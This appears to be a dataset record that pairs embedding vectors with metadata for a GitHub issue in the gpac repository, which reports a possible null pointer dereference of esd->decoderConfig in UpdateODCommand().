0.006252794526517391, 0.012194211594760418, 0.003500891849398613, 0.006126560736447573, -0.012589745223522186, -0.009400230832397938, -0.005057778675109148, 0.00010092151205753908, 0.00946755614131689, 0.013422890566289425, -0.0020344725344330072, -0.00023682038590777665, -0.003006475046277046, 0.005937209352850914, 0.014575827866792679, -0.014668399468064308, 0.005314454901963472, -0.01118433941155672, 0.016957445070147514, 0.018834125250577927, 0.019625190645456314, 0.0007363654440268874, -0.00026009479188360274, 0.021426130086183548, -0.013877333141863346, -0.0024741878733038902, -0.008945788256824017, -0.025482453405857086, -0.0036292297299951315, 0.002669850829988718, -0.00682084821164608, 0.0010009310208261013, 0.003993204794824123, -0.019389554858207703, -0.013498630374670029, -0.0014832504093647003, -0.03601878881454468, 0.008668073453009129, 0.0007027030223980546, 0.01607380621135235, -0.006799809169024229, -0.006050819996744394, -0.0010493207955732942, -0.019490541890263557, -0.016056975349783897, 0.02985856682062149, 0.009433893486857414, 0.0010135543998330832, -0.009055190719664097, 0.016385182738304138, -0.016629235818982124, 0.013919411227107048, 0.028209108859300613, 0.02684578113257885, -0.0024068630300462246, -0.017571784555912018, 0.0029181111603975296, 0.025819076225161552, -0.01051950640976429, -0.016789132729172707, 0.011722938157618046, 0.008726982399821281, 0.008971035480499268, -0.006681990344077349, -0.003557697171345353, -0.005609001033008099, 0.01558570098131895, 0.015223830007016659, 0.01864898018538952, 0.006501054856926203, 0.009273996576666832, -0.010469012893736362, 0.02124098688364029, 0.007262667175382376, -0.01782425120472908, -0.0039300876669585705, -0.01996181532740593, 0.01311151310801506, 0.01469364669173956, 0.010384856723248959, -0.0030148904770612717, 0.03372974693775177, 0.006429522298276424, -0.001131898839958012, 0.015164920128881931, -0.011798678897321224, 0.014087722636759281, -0.009173009544610977, -0.01641884632408619, -0.003092734841629863, 0.0008252552943304181, 0.014702062122523785, -0.035345543175935745, 0.01736980862915516, -0.010780390352010727, -0.02214987203478813, -0.014954530633985996, -0.0033346835989505053, 0.00029165332671254873, -0.006286457180976868, 0.014205541461706161, -0.02122415602207184, -0.0011213794350624084, -0.017336146906018257, -0.0006153911235742271, -0.002844474511221051, 0.006480015814304352, 0.01180709432810545, 0.01278330385684967, -0.011445223353803158, -0.023092420771718025, -0.007060692645609379, -0.0160906370729208, -0.010553169064223766, 0.018850956112146378, -0.001494821859523654, 0.011175923980772495, 0.000009566176231601276, -0.004325621295720339, -0.02344587631523609, 0.014045645482838154, 0.021644936874508858, -0.007073316257447004, -0.011975405737757683, -0.0019229657482355833, 0.0076455771923065186, -0.0011066520819440484, 0.0246577225625515, -0.007961162365972996, -0.010502675548195839, 0.03541286662220955, -0.019473711028695107, 0.004104711581021547, 0.02772100269794464, -0.013683773577213287, -0.015737181529402733, 0.02748536691069603, 0.010115557350218296, 0.0012455096002668142, 0.0032042416278272867, -0.028293265029788017, -0.013683773577213287, -0.003841723781079054, -0.01651141792535782, -0.019456878304481506, -0.012741226702928543, 0.02085386961698532, -0.018329188227653503, -0.02620619535446167, -0.013061019591987133, 0.03500891849398613, 0.015366895124316216, 0.012303614988923073, 0.0026446038391441107, 0.036826688796281815, -0.0032442158553749323, 0.00134123710449785, -0.03729796037077904, -0.001774640753865242, -0.015526792034506798, 0.006029780954122543, 0.01868264377117157, 0.013380812481045723, 0.0025099541526287794, -0.023933980613946915, 0.004289854783564806, 0.008529216051101685, -0.01040168758481741, 0.0014464320847764611, 0.012724394910037518, -0.010780390352010727, -0.0012265744153410196, 0.007893837988376617, 0.009358152747154236, 0.008289370685815811, -0.005571130663156509, 0.009374984540045261, -0.0027834614738821983, -0.012354108504951, 0.01461790595203638, 0.012968447990715504, -0.0005470143514685333, -0.02876453846693039, -0.0025330970529466867, 0.001550575252622366, -0.004233049228787422, 0.015493129380047321, -0.0005559559212997556, 0.005621624179184437, -0.0025941103231161833, -0.004384530242532492, 0.009804179891943932, -0.006181261967867613, 0.02408546209335327, -0.0037154897581785917, 0.016275780275464058, 0.021442962810397148, 0.003982685040682554, -0.011100183241069317, 0.004771647974848747, 0.00341042410582304, 0.0016778613207861781, -0.0075698369182646275, -0.0034882682375609875, 0.016578741371631622, -0.026525987312197685, -0.011781847104430199, -0.0042288415133953094, 0.00746043398976326, -0.0072500440292060375, -0.010561584495007992, -0.012749642133712769, 0.0023437461350113153, -0.026037883013486862, 0.012909538112580776, 0.0033136445563286543, -0.0006127612432464957, 0.011117014102637768, -0.024102292954921722, -0.022587483748793602, -0.015754012390971184, -0.007658200804144144, 0.030380334705114365, -0.009518049657344818, -0.010670986957848072, -0.0014274970162659883, -0.016191624104976654, 0.011840756051242352, 0.007851759903132915, 0.006644120439887047, -0.01625053398311138, 0.012547667138278484, -0.005773105192929506, -0.014979776926338673, 0.01760544627904892, -0.008659658022224903, 0.026458662003278732, 0.02122415602207184, 0.00440136156976223, 0.004695907700806856, 0.030161529779434204, -0.0076876552775502205, 0.015106011182069778, 0.0037638794165104628, -0.010283869691193104, 0.007523551117628813, 0.010965533554553986, 0.005596377421170473, 0.005200843792408705, 0.00205445964820683, -0.022217197343707085, -0.011563041247427464, -0.002236447064206004, 0.0058109755627810955, -0.012859044596552849, 0.02107267454266548, -0.008676488883793354, -0.009055190719664097, 0.013448136858642101, -0.012219458818435669, 0.0009956712601706386, 0.02491019107401371, -0.021560780704021454, 0.04015926644206047, -0.0008289371035061777, 0.018632149323821068, 0.009661114774644375, 0.004472894128412008, 0.016906950622797012, 0.010166050866246223, 0.0035724244080483913, 0.013498630374670029, 0.011243248358368874, -0.0010661520063877106, -0.006450561340898275, -0.01051950640976429, -0.00015950201486703008, -0.024859698489308357, -0.005015700589865446, -0.02595372684299946, 0.033611927181482315, 0.010166050866246223, 0.005491182208061218, -0.005714195780456066, -0.02514582872390747, -0.003837516065686941, 0.020769713446497917, -0.02512899786233902, 0.0290170069783926, -0.04322254657745361, -0.02344587631523609, 0.01685645803809166, -0.013363980688154697, -0.002850786317139864, -0.0029454617761075497, -0.00932449009269476, -0.013035772368311882, 0.017874745652079582, 0.0050914413295686245, -0.01514808926731348, 0.0027434872463345528, -0.014702062122523785, -0.024758709594607353, -0.0321812741458416, 0.0059498329646885395, -0.016553495079278946, 0.012514004483819008, 0.036624714732170105, -0.009189840406179428, -0.0023837201297283173, 0.010822468437254429, -0.010376441292464733, 0.039418693631887436, -0.01871630549430847, 0.01041010394692421, 0.0107298968359828, 0.012530836276710033, -0.021510286256670952, -0.0034335670061409473, 0.013212500140070915, -0.005280792247503996, 0.0028339549899101257, -0.0017799005145207047, -0.011613534763455391, 0.004969414789229631, 0.005815183278173208, -0.012547667138278484, -0.000017537990061100572, 0.023142913356423378, 0.0027371756732463837, -0.016814379021525383, 0.026929937303066254, -0.011815509758889675, 0.031003089621663094, -0.002110213041305542, 0.0004460270865820348, -0.01581292226910591, 0.017571784555912018, 0.007826512679457664, -0.000010182553523918614, -0.0002620672166813165, -0.032130781561136246, -0.0026929937303066254, 0.0030212022829800844, -0.018379680812358856, 0.005234506446868181, 0.02083703875541687, 0.0019387450302019715, -0.009316074661910534, -0.009619036689400673, 0.016629235818982124, 0.013532293029129505, 0.014155047945678234, -0.03135654330253601, -0.008945788256824017, -0.004737985786050558, 0.01168927550315857, 0.007818097248673439, 0.004104711581021547, -0.010662571527063847, 0.007203758228570223, 0.0064084832556545734, -0.019238073378801346, 0.001565302605740726, -0.004557050298899412, 0.006513678468763828, 0.007881213910877705, -0.01621687039732933, 0.009526465088129044, -0.008945788256824017, -0.01864898018538952, -0.01115909218788147, -0.007043861318379641, 0.004733778070658445, 0.009400230832397938, 0.0018850956112146378, -0.02122415602207184, -0.0026803703512996435, -0.018278693780303, -0.016805963590741158, 0.00746043398976326, 0.007561421487480402, 0.001976615283638239, -0.0008888982702046633, -0.02772100269794464, -0.0029959555249661207, 0.010460597462952137, 0.01678071729838848, 0.0030212022829800844, 0.009273996576666832, 0.003946918994188309, 0.012505589053034782, 0.008142097853124142, -0.01822820119559765, 0.015636194497346878, 0.01699952222406864, 0.0017651731614023447, -0.010856131091713905, -0.01957469806075096, 0.006963913328945637, 0.008971035480499268, 0.025667596608400345, 0.003420943394303322, 0.01630944199860096, -0.012732810340821743, -0.01634310558438301, -0.007119602058082819, -0.020062802359461784, -0.0012339381501078606, 0.0017662250902503729, -0.008377734571695328, -0.013683773577213287, 0.0067072375677526, 0.023361720144748688, 0.007763396017253399, 0.00015831856580916792, -0.014525334350764751, -0.021106338128447533, -0.020348932594060898, 0.016317859292030334, 0.012177380733191967, -0.00841981265693903, -0.013018941506743431, -0.0032105534337460995, -0.00498624611645937, -0.004302477929741144, -0.0055080135352909565, 0.0022511743009090424, 0.013271409086883068, 0.01954103447496891, -0.00035529633169062436, -0.006223340053111315, 0.0007079627830535173, -0.019254904240369797, 0.012960031628608704, 0.004140477627515793, -0.006602042354643345, 0.0032947093714028597, -0.019843997433781624, 0.03925038129091263, -0.004111023154109716, 0.001801991485990584, 0.00976210180670023, 0.002962293103337288, 0.004952583461999893, -0.01599806547164917, -0.01932222954928875, 0.01780742034316063, 0.0020586673635989428, 0.012514004483819008, -0.004321413114666939, 0.016519833356142044, 0.009425478056073189, 0.002423694357275963, -0.011100183241069317, -0.0150302704423666, -0.010351194068789482, -0.01278330385684967, -0.0005391247104853392, 0.00527237681671977, -0.010595247149467468, 0.0022595899645239115, 0.011234832927584648, 0.03605245426297188, -0.011318989098072052, 0.009055190719664097, 0.0010224960278719664, 0.0013233539648354053, 0.0012370939366519451, 0.006698821671307087, 0.008668073453009129, 0.017319316044449806, 0.006656743586063385, -0.004028970841318369, 0.004007931798696518, 0.011377898044884205, 0.00783492811024189, -0.01558570098131895, -0.002465772209689021, -0.02124098688364029, -0.007683447562158108, -0.008613372221589088, 0.007489888463169336, 0.016629235818982124, 0.004817933775484562, -0.002305875765159726, -0.0061307684518396854, -0.010973948985338211, 0.019827166572213173, 0.0013717436231672764, -0.0066483281552791595, -0.012943200767040253, -0.0000635443939245306, 0.01526590809226036, -0.016612404957413673, 0.023092420771718025, 0.0012486653868108988, -0.013422890566289425, 0.0020008101128041744, 0.002261693822219968, -0.006719860713928938, -0.007212173659354448, -0.0036250220146030188, -0.00017449232109356672, 0.020668726414442062, -0.0005033583729527891, -0.01256449893116951, 0.01763910800218582, -0.013187252916395664, -0.01352387759834528, -0.001523224520497024, -0.004285647068172693, 0.02253699116408825, 0.009273996576666832, 0.020954856649041176, -0.013473384082317352, 0.016662897542119026, -0.009947245009243488, -0.013675358146429062, 0.016805963590741158, 0.01822820119559765, -0.0034840605221688747, -0.011857587844133377, -0.0150302704423666, 0.01009031105786562, 0.027350716292858124, 0.0065263016149401665, 0.020921194925904274, 0.0066904062405228615, -0.02253699116408825, 0.026155700907111168, -0.015661440789699554, -0.006492639426141977, -0.012438264675438404, -0.018581656739115715, 0.007721317932009697, -0.004212010186165571, -0.00881955400109291, 0.011781847104430199, 0.004275127314031124, -0.016225287690758705, 0.013709020800888538, -0.006871341727674007, 0.004889466799795628, 0.004193075466901064, -0.0031979300547391176, -0.016385182738304138, 0.0038880095817148685, -0.003157955827191472, -0.02558344043791294, 0.014769387431442738, 0.0015463674208149314, 0.011655612848699093, 0.005011492874473333, -0.0003839619748760015, 0.011966990306973457, 0.009576958604156971, 0.013052603229880333, -0.00585726136341691, 0.005869884509593248, -0.017992563545703888, -0.005705780349671841, 0.004380322527140379, 0.0036334374453872442, 0.012404602020978928, 0.021426130086183548, 0.003136916784569621, 0.008293579332530499, 0.0043466598726809025, -0.00279608485288918, -0.010696234181523323, -0.01651141792535782, 0.005028324201703072, 0.011672444641590118, -0.022200366482138634, 0.004218322224915028, -0.014407516457140446, -0.01937272399663925, -0.014659984037280083, -0.011133845895528793, 0.013507046736776829, 0.002772941952571273, -0.01760544627904892, 0.003458813764154911, -0.016040142625570297, -0.027653679251670837, 0.0083272410556674, 0.0019955504685640335, 0.00997249223291874, 0.0029643969610333443, 0.013397643342614174, -0.01566985622048378, -0.005036739632487297, 0.001620003953576088, -0.02881503291428089, 0.017740095034241676, 0.02661014348268509, 0.00033373135374858975, -0.004763232544064522, 0.006320119369775057, -0.012825381942093372, 0.01848066970705986, -0.03172682970762253, 0.0006159170879982412, 0.006046612281352282, -0.016115883365273476, -0.02125781960785389, -0.018514331430196762, -0.007443602662533522, 0.0193053986877203, -0.003080111462622881, 0.007216381374746561, -0.028057627379894257, -0.015972819179296494, 0.017302485182881355, 0.010940286330878735, 0.01886778697371483, -0.007325784303247929, 0.012084809131920338, -0.002356369514018297, 0.016099052503705025, 0.002619357081130147, -0.008525008335709572, -0.008562878705561161, -0.004355075769126415, -0.011150676757097244, 0.003877490060403943, 0.020045971497893333, -0.005436480976641178, 0.005583754274994135, -0.0067072375677526, -0.029151655733585358, -0.023546863347291946, -0.019843997433781624, -0.009046775288879871, -0.0039784773252904415, 0.019052930176258087, 0.018278693780303, 0.015602531842887402, 0.008844801224768162, 0.0007831772672943771, -0.012067978270351887, 0.03130605071783066, 0.014542166143655777, 0.00047942649689503014, 0.008613372221589088, -0.0036944507155567408, -0.01299369428306818, 0.0031558519694954157, -0.0015432116342708468, -0.02469138614833355, -0.0030169945675879717, -0.005470143165439367, 0.009290828369557858, 0.009736855514347553, -0.0016862768679857254, 0.0075067197903990746, 0.0008363007800653577, -0.02018062211573124, 0.0063453661277890205, 0.004864219576120377, 0.034672293812036514, -0.003549281507730484, -0.013010526075959206, -0.008335656486451626, 0.007174303289502859, -0.00206813495606184, -0.011891250498592854, 0.006597834639251232, 0.0025330970529466867, 0.019153917208313942, -0.000468381040263921, -0.0016084325034171343, 0.004045802168548107, -0.007115394342690706, 0.003627125872299075, -0.01893511228263378, -0.012286783196032047, 0.013894164003431797, 0.012413017451763153, 0.017134172841906548, -0.0044897254556417465, 0.008642826229333878, 0.004251984413713217, -0.014037229120731354, -0.006656743586063385, -0.002144927391782403, 0.004359283484518528, -0.02876453846693039, 0.01709209382534027, -0.013591201975941658, 0.016040142625570297, -0.010056648403406143, -0.0033641380723565817, -0.024220110848546028, -0.010822468437254429, 0.00912251602858305, 0.0020102777052670717, 0.007763396017253399, -0.008247293531894684, 0.0030653842259198427, -0.009871505200862885, 0.01297686342149973, 0.0021470312494784594, -0.0009904114995151758, 0.02209937945008278, 0.009677945636212826, 0.0011361066717654467, 0.0021607065573334694, -0.005293415859341621, 0.011840756051242352, -0.009543295949697495, 0.03537920489907265, 0.002061823382973671, -0.008066357113420963, -0.013069435022771358, -0.007321576587855816, -0.004418192896991968, 0.012640238739550114, -0.0005054622888565063, 0.009753686375916004, -0.03238324820995331, 0.007182719185948372, 0.01203431561589241, -0.01396148931235075, -0.015299569815397263, -0.017773758620023727, 0.016696561127901077, -0.005697364918887615, -0.008861632086336613, 0.002960189012810588, 0.022839952260255814, -0.023344889283180237, -0.022015223279595375, -0.0042982702143490314, 0.008760645054280758, 0.018985604867339134, -0.011016027070581913, 0.01620003953576088, 0.0044686864130198956, 0.025819076225161552, 0.006782977841794491, 0.0043298290111124516, 0.015089180320501328, -0.007965370081365108, 0.005120895802974701, -0.0005286051891744137, -0.001684173010289669, 0.006517886184155941, 0.009955661371350288, 0.01826186291873455, -0.011268495582044125, 0.0035261386074125767, -0.0003129553224425763, -0.008222046308219433, 0.006492639426141977, 0.006185469683259726, 0.015047102235257626, 0.02684578113257885, 0.011529379524290562, 0.005175597034394741, -0.003376761684194207, -0.0014485360588878393, -0.01977667212486267, 0.004180451855063438, -0.016301026567816734, 0.011866003274917603, -0.008701736107468605, 0.018632149323821068, 0.010679403319954872, -0.007287913933396339, -0.008323033340275288, 0.0056047928519546986, 0.0048852586187422276, -0.007885421626269817, 0.01975984126329422, 0.0017788485856726766, 0.0006953394040465355, 0.01784108392894268, -0.00526816863566637, -0.001803043414838612, -0.007258459459990263, 0.01481146551668644, -0.0026824742089957, -0.0005638455622829497, 0.020954856649041176, -0.02836059033870697, -0.0008420865051448345, -0.0065725878812372684, 0.01696586050093174, -0.004960999358445406, -0.01762227714061737, -0.01416346337646246, -0.0015411076601594687, 0.01804305799305439, 0.07917401194572449, -0.015375310555100441, 0.0024910192005336285, -0.01955786719918251, 0.003136916784569621, -0.010561584495007992, -0.030178360641002655, 0.03665837645530701, -0.02191423624753952, 0.0407651923596859, 0.008945788256824017, -0.00044760500895790756, 0.002115472685545683, 0.023715175688266754, -0.003974269609898329, -0.00868490431457758, 0.018396513536572456, -0.0035261386074125767, -0.013456552289426327, -0.017285652458667755, 0.0030506569892168045, -0.014365438371896744, 0.0009520153398625553, 0.000206182332476601, 0.007590875960886478, -0.005162973888218403, -0.0030359295196831226, -0.007149056531488895, -0.01780742034316063, 0.0025036425795406103, 0.018346019089221954, -0.00370286637917161, -0.01074672769755125, -0.012244705110788345, 0.006105521693825722, -0.01042693480849266, -0.004266711883246899, 0.016494587063789368, -0.0020649791695177555, 0.020079633221030235, -0.022839952260255814, -0.01805988885462284, -0.006766146514564753, 0.015114426612854004, 0.001571614295244217, -0.018514331430196762, 0.0006043456378392875, -0.0072458358481526375, -0.02188057266175747, 0.019170748069882393, 0.002061823382973671, 0.025835907086730003, 0.0040226592682302, -0.006092898081988096, -0.01115909218788147, 0.005402818322181702, 0.004111023154109716, 0.01802622713148594, 0.017453964799642563, 0.0008773268200457096, 0.010738312266767025, 0.013229331001639366, 0.0008000084781087935, 0.01320408470928669, -0.01233727764338255, -0.013810007832944393, -0.0214934553951025, 0.004708531312644482, 0.009804179891943932, 0.008769060485064983, 0.009265581145882607, -0.003528242465108633, 0.0012381458654999733, -0.004056321922689676, 0.00047942649689503014, 0.021560780704021454, 0.00881955400109291, 0.004737985786050558, -0.020298440009355545, -0.0025330970529466867, 0.044972993433475494, -0.006736692041158676, 0.006076066754758358, 0.017891576513648033, 0.02236867882311344, 0.006677782628685236, -0.022385509684681892, 0.004481309559196234, -0.015013439580798149, 0.012572914361953735, -0.0067072375677526, -0.004599128384143114, -0.028444744646549225, 0.00002460578252794221, 0.008525008335709572, 0.0003576632298063487, -0.0040962956845760345, 0.0048852586187422276, 0.0010724636958912015, -0.02383299358189106, 0.011857587844133377, -0.010595247149467468, 0.017538120970129967, 0.0067030293866992, -0.00871015153825283, 0.015989650040864944, 0.0006338002858683467, 0.006732484325766563, 0.030010048300027847, -0.03278719633817673, -0.003528242465108633, 0.0061097294092178345, -0.007212173659354448, -0.004304582253098488, -0.010334363207221031, 0.0005622676108032465, -0.020029140636324883, -0.034907929599285126, -0.009964076802134514, -0.0161242987960577, -0.002520473673939705, 0.0065094707533717155, 0.01599806547164917, -0.009215087629854679, -0.0032252806704491377, -0.027131911367177963, 0.010250207036733627, 0.011251663789153099, -0.016359936445951462, 0.0033241640776395798, -0.013835255056619644, 0.017176249995827675, 0.03263571858406067, -0.00424988055601716, 0.06113095581531525, 0.0049062976613640785, 0.00016883807256817818, 0.0009388659382238984, -0.0007631902117282152, -0.0020081738475710154, -0.018968774005770683, -0.01999547705054283, -0.028629889711737633, -0.001467471127398312, -0.00445606280118227, -0.018329188227653503, 0.018093550577759743, -0.013927826657891273, 0.013717436231672764, 0.011226417496800423, 0.003164267633110285, -0.006984952371567488, -0.021594442427158356, -0.01214371807873249, -0.011234832927584648, -0.009181424975395203, 0.02188057266175747, -0.004016347695142031, -0.005003077443689108, 0.008318825624883175, -0.0061770542524755, -0.014247619546949863, 0.006202301010489464, 0.00568474130704999, 0.004956791643053293, -0.012724394910037518, -0.00039816333446651697, 0.021779585629701614, 0.004561258014291525, 0.0161411315202713, 0.009896751493215561, 0.03394855186343193, -0.008903710171580315, -0.014659984037280083, 0.008886879310011864, 0.0038669705390930176, 0.0002971760695800185, -0.0009199308697134256, -0.011058105155825615, 0.011377898044884205, -0.0031684753485023975, -0.0027371756732463837, 0.010300700552761555, -0.004847388714551926, -0.010342778638005257, 0.013473384082317352, -0.011285326443612576, -0.011436806991696358, 0.023900318890810013, -0.02900017611682415, -0.003429359057918191, -0.008945788256824017, -0.006993367802351713, -0.01061207801103592, 0.008928957395255566, 0.0034882682375609875, 0.0037365288008004427, 0.002549928380176425, -0.017925238236784935, 0.007452018558979034, 0.008487137965857983, 0.016688145697116852, -0.007115394342690706, -0.007536174263805151, 0.0005401766393333673, 0.003240007907152176, 0.005133518949151039, -0.007380485534667969, -0.007851759903132915, -0.011436806991696358, 0.006122352555394173, -0.0041636205278337, 0.0005180856678634882, 0.015215414576232433, -0.00655575655400753, -0.0246745552867651, -0.008293579332530499, -0.0032526315189898014, -0.01849750056862831, -0.02060140110552311, -0.0010845611104741693, -0.007830720394849777, -0.012168965302407742, 0.02837742120027542, -0.01913708634674549, -0.004540218971669674, -0.031188232824206352, -0.006071859039366245, 0.009921998716890812, 0.0026635390240699053, -0.0005817287019453943, 0.013978320173919201, 0.008693319745361805, 0.002282732864841819, 0.006833471357822418, 0.03394855186343193, -0.013995151035487652, -0.002636188408359885, -0.007599291391670704, -0.01972617767751217, -0.0408325158059597, -0.014735724776983261, 0.0030422413256019354, -0.004485517740249634, -0.00052439741557464, 0.005474351346492767, -0.01363328006118536, 0.0034735410008579493, -0.003576632123440504, 0.007283706218004227, 0.0005990858771838248, 0.008844801224768162, 0.006252794526517391, -0.002863409696146846, -0.009408646263182163, 0.018211370334029198, 0.014786218293011189, -0.004079464823007584, -0.0010519506176933646, -0.008167345076799393, 0.0059287939220666885, 0.027115080505609512, 0.009484387002885342, 0.018850956112146378, 0.004052113741636276, -0.017108924686908722, -0.004965207073837519, 0.014744140207767487, 0.015400557778775692, 0.03174366429448128, 0.0066904062405228615, 0.015678271651268005, 0.014247619546949863, 0.008470306172966957, -0.01826186291873455, 0.046285826712846756, 0.0004639102262444794, -0.011765016242861748, -0.011335819959640503, 0.01148730143904686, -0.02108950726687908, -0.01607380621135235, 0.005440688692033291, -0.010418519377708435, 0.0029033836908638477, -0.009088853374123573, 0.020971687510609627, -0.0011255871504545212, -0.0013727955520153046, 0.01469364669173956, 0.009938829578459263, 0.014870374463498592, -0.005954040680080652, 0.007851759903132915, -0.001759913400746882, -0.022503327578306198, -0.019692515954375267, 0.021628106012940407, 0.01159670390188694, -0.002730863867327571, 0.017958901822566986, -0.006623081397265196, -0.0011024442501366138, -0.01203431561589241, -0.006665159482508898, 0.0078054736368358135, 0.0075067197903990746, -0.0006248586578294635, 0.009610621258616447, 0.020870700478553772, 0.011142261326313019, 0.011327404528856277, 0.022722134366631508, 0.03719697520136833, 0.008478722535073757, -0.00530603900551796, -0.013464968651533127, 0.004838972818106413, 0.023311225697398186, -0.0014348606346175075, -0.017007937654852867, -0.0014464320847764611, 0.010982364416122437, 0.015097595751285553, 0.012345693074166775, -0.030010048300027847, 0.010477428324520588, -0.009711608290672302, -0.02172909304499626, 0.007489888463169336, 0.009711608290672302, -0.014306528493762016, -0.0023500577080994844, -0.008491345681250095, -0.008028487674891949, -0.00792749971151352, -0.014205541461706161, 0.018144045025110245 ]
1,792
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
https://github.com/gpac/gpac/blob/4a8000c4595bcff82fe54afc4f6a515c2e1322ba/src/scene_manager/loader_isom.c#L51-L65 The esd->decoderConfig is not checked before referenced.
Possible null pointer dereference in UpdateODCommand()
https://api.github.com/repos/gpac/gpac/issues/1810/comments
0
2021-05-26T06:50:53
2021-05-26T15:37:14Z
https://github.com/gpac/gpac/issues/1810
901,852,171
1,810
false
This is a GitHub Issue repo:gpac owner:gpac Title : Possible null pointer dereference in UpdateODCommand() Issue date: --- start body --- https://github.com/gpac/gpac/blob/4a8000c4595bcff82fe54afc4f6a515c2e1322ba/src/scene_manager/loader_isom.c#L51-L65 The esd->decoderConfig is not checked before referenced. --- end body ---
331
[ -0.016966424882411957, 0.045545794069767, -0.008558711037039757, 0.03044622391462326, -0.03585461527109146, 0.02487310953438282, -0.02525746263563633, 0.03374067321419716, -0.01282090786844492, 0.036870405077934265, -0.012031611986458302, 0.02052168734371662, 0.009499002248048782, 0.027371402829885483, -0.005202488042414188, 0.056335121393203735, -0.02118057757616043, 0.0009351437911391258, -0.02354160137474537, -0.005006880033761263, 0.05232687294483185, -0.050158023834228516, -0.003484911983832717, 0.027275314554572105, 0.014495586976408958, 0.028277376666665077, -0.008929336443543434, -0.004327399656176567, 0.01122172549366951, -0.0027093433309346437, 0.00035646994365379214, 0.008572437800467014, -0.015264292247593403, 0.01478385180234909, 0.07335645705461502, 0.016183992847800255, 0.024406395852565765, 0.03121492825448513, -0.006036396138370037, 0.024680932983756065, -0.020768770948052406, -0.05825688689947128, -0.029238257557153702, 0.009190146811306477, -0.0004392602131702006, 0.0026355611626058817, 0.010974641889333725, 0.011077593080699444, -0.002992460271343589, 0.028551913797855377, 0.014234776608645916, -0.05293085426092148, -0.03121492825448513, -0.0465615838766098, -0.0049554044380784035, -0.042882777750492096, 0.016197720542550087, -0.003778324229642749, -0.028112653642892838, 0.04019230976700783, -0.008339080959558487, 0.017227236181497574, -0.01514075044542551, -0.0029993236530572176, -0.002930689137428999, 0.025161374360322952, 0.003091980004683137, 0.018064575269818306, -0.005006880033761263, 0.005775585304945707, -0.004776954650878906, -0.04782445728778839, -0.04617723077535629, 0.03536044806241989, 0.03209345042705536, -0.04936186596751213, 0.04549088701605797, 0.021029582247138023, -0.007024731487035751, 0.008098860271275043, -0.0100343506783247, 0.013829832896590233, -0.024667207151651382, -0.0002571645600255579, 0.0015193942235782743, -0.031901273876428604, -0.03585461527109146, -0.06144152209162712, 0.012553233653306961, -0.00893620029091835, -0.01166098564863205, 0.008490076288580894, -0.009739222936332226, 0.013026810251176357, 0.02348669432103634, -0.00759782874956727, -0.043322037905454636, -0.017021333798766136, 0.0015537113649770617, -0.01052851788699627, -0.014632855542004108, -0.02156493067741394, 0.02013733610510826, 0.01825675182044506, 0.022086553275585175, 0.020768770948052406, 0.050487469881772995, 0.0013546716654673219, 0.00681196479126811, 0.13496269285678864, 0.004749501124024391, -0.033383775502443314, 0.0029169623740017414, 0.0007708502234891057, 0.022649355232715607, 0.018490109592676163, -0.027000775560736656, -0.02127666585147381, 0.010487337596714497, -0.012635594233870506, -0.012264968827366829, -0.01392592117190361, -0.007556648459285498, 0.02608107589185238, -0.020933493971824646, 0.048620615154504776, -0.01654089242219925, 0.0005289139226078987, -0.026506608352065086, -0.01714487560093403, -0.036760587245225906, -0.008112587034702301, -0.013994555920362473, -0.009505865164101124, 0.012779726646840572, 0.03711748868227005, -0.012910132296383381, 0.026177162304520607, 0.011050139553844929, 0.009752949699759483, -0.08719315379858017, -0.031516920775175095, 0.04032957926392555, -0.021427663043141365, -0.04617723077535629, 0.0034883436746895313, -0.003285872284322977, 0.024900563061237335, -0.045545794069767, -0.008606755174696445, -0.010706967674195766, -0.012779726646840572, -0.0058785369619727135, -0.017611589282751083, 0.0411531925201416, 0.03533299267292023, -0.0022615038324147463, 0.000021354417185648344, -0.05312303081154823, 0.043926022946834564, -0.0063864318653941154, -0.017131147906184196, -0.0012954744743183255, -0.016005543991923332, -0.010274570435285568, -0.032560162246227264, 0.020645229145884514, 0.01677425019443035, -0.03475646302103996, 0.015978090465068817, -0.03772146999835968, 0.020755045115947723, -0.036431144922971725, 0.015964362770318985, -0.03401521220803261, -0.03401521220803261, 0.013472934253513813, -0.003248123452067375, -0.03571734577417374, -0.008263582363724709, -0.02326706424355507, -0.021825741976499557, 0.031187474727630615, -0.000004165652626397787, 0.01747431978583336, -0.03385049104690552, 0.00658890325576067, -0.017941033467650414, -0.0035827159881591797, -0.022923892363905907, -0.0031074227299541235, 0.0049828579649329185, -0.00035475409822538495, -0.00986962765455246, 0.01737823151051998, -0.00827731005847454, -0.04118064418435097, -0.023802412673830986, -0.007989045232534409, -0.0026973322965204716, 0.032669976353645325, -0.004653412848711014, 0.010610879398882389, -0.0006653247983194888, -0.03761165589094162, -0.011207998730242252, 0.0007373909465968609, 0.03335632383823395, 0.025133920833468437, -0.043596576899290085, -0.006314365658909082, -0.06133170798420906, 0.03901179879903793, 0.0013555295299738646, -0.007364471908658743, 0.02339060604572296, -0.039121612906455994, 0.009279372170567513, 0.014962300658226013, 0.0027024797163903713, 0.028277376666665077, -0.02344551309943199, 0.003479764563962817, -0.021029582247138023, -0.015895728021860123, -0.016691887751221657, 0.004207289312034845, -0.010308887809515, 0.012182607315480709, 0.005219646729528904, -0.00024365214630961418, 0.0010192209156230092, 0.024859381839632988, -0.02984224073588848, -0.028606820851564407, -0.02967751771211624, 0.049334414303302765, -0.01144135557115078, -0.024022042751312256, -0.005792743992060423, -0.014728943817317486, 0.030693307518959045, 0.0012156869051977992, 0.003877843962982297, -0.005638316739350557, 0.06292402744293213, 0.027769481763243675, -0.021139398217201233, 0.028634274378418922, 0.0351957231760025, -0.005573113914579153, -0.04675376042723656, -0.00843516830354929, 0.006681559607386589, -0.003447163151577115, -0.002549768192693591, 0.02669878490269184, 0.028140107169747353, -0.028634274378418922, -0.043322037905454636, 0.0007571232854388654, -0.023692598566412926, -0.011509990319609642, -0.02591635286808014, -0.007803732063621283, -0.03497609496116638, 0.007103661075234413, -0.0038641171995550394, -0.009608817286789417, -0.010775602422654629, 0.035113364458084106, -0.023363152518868446, -0.05586840957403183, -0.012175744399428368, 0.001784494612365961, 0.00964999757707119, 0.022814076393842697, 0.0341799333691597, -0.004794113337993622, 0.01552510354667902, -0.024777021259069443, -0.010576562024652958, -0.020000066608190536, 0.018737193197011948, 0.014523040503263474, 0.04000013321638107, 0.022429725155234337, 0.010974641889333725, -0.0069183483719825745, 0.018490109592676163, 0.03269743174314499, 0.028497006744146347, -0.056554753333330154, 0.0186960119754076, -0.0335485003888607, 0.014605402015149593, 0.016389897093176842, -0.0025480524636805058, -0.03711748868227005, 0.004015112761408091, -0.013280757702887058, 0.014001418836414814, -0.018998004496097565, 